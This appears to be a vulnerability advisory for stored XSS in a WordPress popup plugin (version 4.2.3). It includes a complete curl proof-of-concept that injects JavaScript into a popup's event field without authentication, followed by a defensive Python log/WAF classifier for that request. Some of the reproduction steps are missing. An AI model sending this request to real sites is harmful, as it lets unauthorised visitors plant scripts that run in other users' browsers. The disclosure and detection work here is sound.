Description
The plugin does not prevent simple visitors from updating existing popups and injecting raw JavaScript into them, which could lead to Stored XSS attacks.
$POPUPID with that popup’s ID:

```
curl --url 'http://vulnerable-site.tld/' --data 'sgpb-is-preview=1&blah[name]=sgpb-is-preview&blah[value]=0&post_ID=$POPUPID&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=everywhere&sgpb-type=html&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=contact-form-7&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Boperator%5D=redirect-url&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bvalue%5D=https%3A%2F%2Fexample.com&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120px&sgpb-min-height=&sgpb-copy-to-clipboard-message=Copied+to+Clipboard%21&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&sgpb-ShouldOpen=alert%28document.domain%29%3B&sgpb-WillOpen=&sgpb-DidOpen=&sgpb-ShouldClose=&sgpb-WillClose=&sgpb-DidClose=&sgpb-css-editor='
```
3) Visit the site

CPE | Name | Operator | Version |
---|---|---|---|
 | | eq | 4.2.3 |
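
For defenders, the request shape above can be matched in WAF or access-log data. The following is an added example, not code from the plugin or from this advisory: it classifies URL-encoded POST bodies by the parameters that appear in the request on this page. The `authenticated` argument, the verdict names and the popup ID `123` in the samples are assumptions made for illustration.

```python
from urllib.parse import parse_qs

# Custom-JS event fields that appear in the request quoted on this page.
JS_FIELDS = ("sgpb-ShouldOpen", "sgpb-WillOpen", "sgpb-DidOpen",
             "sgpb-ShouldClose", "sgpb-WillClose", "sgpb-DidClose")

def inspect_body(body, authenticated):
    """Classify one URL-encoded POST body.

    `authenticated` is an assumption supplied by the caller: True only when
    the request carried a session for a user allowed to edit popups.
    """
    params = parse_qs(body, keep_blank_values=True)

    def first(key):
        return params.get(key, [""])[0]

    is_preview = first("sgpb-is-preview") == "1"
    popup_id = first("post_ID")
    js_set = sorted(k for k in JS_FIELDS if first(k).strip())
    # Array-style parameter that re-declares the preview flag, as in blah[name]=...
    flag_override = any(k.endswith("[name]") and "sgpb-is-preview" in v
                        for k, v in params.items())
    unauth_write = is_preview and popup_id.isdigit() and not authenticated
    if unauth_write and js_set:
        verdict = "block"      # visitor request that stores JavaScript in a popup
    elif unauth_write or (flag_override and not authenticated):
        verdict = "review"     # popup update shape without a script payload
    else:
        verdict = "allow"
    return {"verdict": verdict, "popup_id": popup_id,
            "js_fields": js_set, "flag_override": flag_override}

# Constructed sample bodies (shortened; popup ID 123 is made up).
_POC_LIKE = ("sgpb-is-preview=1&blah[name]=sgpb-is-preview&blah[value]=0"
             "&post_ID=123&sgpb-type=html"
             "&sgpb-ShouldOpen=alert%28document.domain%29%3B&sgpb-WillOpen=")
SAMPLES = {
    "poc_like": (_POC_LIKE, False),
    "editor_preview": (_POC_LIKE, True),
    "contact_form": ("your-name=Ada&your-message=hello", False),
    "preview_no_js": ("sgpb-is-preview=1&post_ID=123&sgpb-ShouldOpen=", False),
}

def run_samples():
    return {name: inspect_body(body, auth)["verdict"]
            for name, (body, auth) in SAMPLES.items()}
```

A match is a reason to inspect the stored popup's custom JS fields and to confirm the plugin has been updated.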